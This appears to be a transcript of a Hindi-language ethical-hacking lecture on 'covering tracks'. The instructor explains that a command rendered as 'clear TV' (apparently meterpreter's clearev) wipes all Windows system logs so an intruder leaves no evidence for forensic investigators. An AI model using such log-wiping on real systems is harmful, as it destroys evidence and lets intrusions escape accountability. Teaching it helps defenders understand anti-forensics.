कवरिंग ट्रैक का मतलब क्या होता है कि आपने जो ये जो भी टास्क परफॉर्म किया है, उस सिस्टम में लॉग बन जाते हैं आपके। तो साइबर फॉरेंसिक जब होता है, फॉरेंसिक चलता है किसी सिस्टम का, तो वहाँ पे आपके लॉग्स आ जाते हैं। तो अब यहाँ पे चीज़ है कि हाउ कैन यू कवर ऑल दीज ट्रैक्स, हाउ कैन यू हाइड योर आइडेंटिटी, हाउ कैन यू डिलीट योर एविडेंसेस, राइट। तो यहाँ पे आप क्या लिखो, क्लियर टीवी। अब ये उस विंडोज़ के सारे जो हैं रिकॉर्ड डिलीट कर देगा, जितने भी हैं सिस्टम लॉग्स। अब वहाँ पे कोई भी लॉग्स नहीं बचेगा। तो वहाँ लॉग्स नहीं है तो आप जो है ट्रैकेबल नहीं रह पाओगे। दैट इज कम्स अंडर कवरिंग ट्रैक। ठीक है, तो ये था हमारा आज का टॉपिक। यस सर। ओके, मैं रिकॉर्डिंग स्टॉप कर देता हूँ।